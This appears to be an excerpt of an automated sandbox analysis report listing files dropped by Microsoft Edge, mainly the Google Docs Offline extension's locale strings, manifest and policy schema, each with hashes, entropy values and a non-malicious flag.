                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                              MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                              SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                              SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                              SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                              MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                              SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                              SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                              SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):937
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                              MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                              SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                              SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                              SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1337
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                              MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                              SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                              SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                              SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2846
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                              MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                              SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                              SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                              SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):934
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):963
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1320
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):884
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):980
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1941
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1969
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1674
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1063
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1333
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1263
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1074
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1205
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):843
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):912
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.751992630887702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
Preview:[{"description":"treehash per file","signed_content":{"payload":"
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):854
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2525
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.417833205646285
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):97
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3777)
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):98880
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.414989230634404
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:M+TW9bPq1M3ZOC0pJ/BjXf3Zk/7hry6fq66V3gr9KUw5SXfPxhZhGurH6c/V:WPLZwJJXf3ZvRV3gJKU/fP+urHRV
                                                                                                                                                                                                                                                                                              MD5:DC93A1045D1AD8D7ADD06B93B2FE79E2
                                                                                                                                                                                                                                                                                              SHA1:CAFCC8DB7F8E3FD2F8C1EFAC7B385D7616F55EA3
                                                                                                                                                                                                                                                                                              SHA-256:D5CEB4449384CD2D7898C052B7B99417961880945FC4EAE80EBBAF8E24CC0A3E
                                                                                                                                                                                                                                                                                              SHA-512:025F7103D1F7D607825BE916D0131C1E04B295EB562974A77F5A16E7BF40250B5608071779B420E4738F86F09A6F7C889469FA898268894FFFEEB7465C589E81
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
